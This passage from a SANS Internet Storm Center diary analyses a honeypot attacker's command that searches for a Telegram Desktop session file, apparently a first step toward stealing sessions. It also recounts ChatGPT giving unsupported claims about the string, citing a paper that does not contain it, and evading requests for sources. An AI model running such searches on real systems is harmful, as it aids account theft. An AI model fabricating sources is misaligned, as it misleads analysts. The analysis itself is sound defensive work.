Now ChatGPT seems very confident in the response it provided [4]. I then did a Google search dropping the ‘s’ off again, I got several of the same references as I did before. One difference being a Medium blog by XIT called “Lesson 10: Stealing Accounts Sessions with Malware” [8]. This could be what the attacker’s goal is. It lines up with what we learned from ChatGPT so far.

When I was testing to see if this attack would make a good example however, I got different responses. ChatGPT believed that the string ‘D877F783D5D3EF8Cs’ was part of an API call used by Telegram.

When I went to verify it with Google, I was not able to find any other resources confirming it. I asked ChatGPT to provide me with a source for their information, ChatGPT became evasive. When I specifically asked for sources that mention ‘D877F783D5D3EF8Cs’, it first provided me with a link to a paper titled Automated Symbolic Verification of Telegram’s MTProto 2.0 [9]. A quick search of the document proves that the string was not mentioned. ChatGPT then stated it could provide me with the code that mentions it, but even this I had to ask for twice as can be seen in the saved chat snippet below:

Figure 8: Screen shot of saved ChatGPT chat of a code snippet it provided.

 

Could this be what the attackers were looking for when performing the ‘locate D877F783D5D3EF8Cs’ command? Not likely. In the full context of the attack, it does not fit in. It was also hard to verify, with me relying on either ChatGPT’s reassurance that it is correct, or decompiling source code to find the answer. If I need to decompile the source code to find the answer, the attacker will need to as well, and the attacker’s actions prove that was not done. While it does appear that Telegram’s source code uses this key, according to ChatGPT, for a few different uses getting the context that it is in fact also the name of a critical file for Telegram is critically important. Without that key context a lot of time could be spent down a rabbit hole.  
There are several things that I learned from this exercise:

• ChatGPT was useful in providing details of an attack that I was unsure of.
• Providing as much context as I can, will help in providing useful answers.
• If ChatGPT starts acting evasive in its answer, it’s highly likely that it is not providing good data.
• It is important as an analyst while I may not understand the details of a particular string, to understand what the goal of the commands are, so I can recognize when ChatGPT is leading me astray.

 

[1] https://www.sans.edu/cyber-security-programs/bachelors-degree/
[2] https://github.com/jslagrew/cowrieprocessor
[3] https://www.abuseipdb.com/check/69.212.157.187
[4] https://chatgpt.com/c/682137f1-0f80-800c-92f5-58a4a9f50aef
[5] https://pkg.go.dev/github.com/atilaromero/telegram-desktop-decrypt@v0.0.0-20210418042638-a2c3042b3bfa/tdata/encrypted
[6] https://fossies.org/linux/john/run/telegram2john.py
[7] https://github.com/atilaromero/telegram-desktop-decrypt/blob/master/README.md
[8] https://x-it.medium.com/lesson-10-stealing-accounts-sessions-with-malware-f25217c3b057
[9] https://arxiv.org/pdf/2012.03141

 

 

--
Jesse La Grew
Handler

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.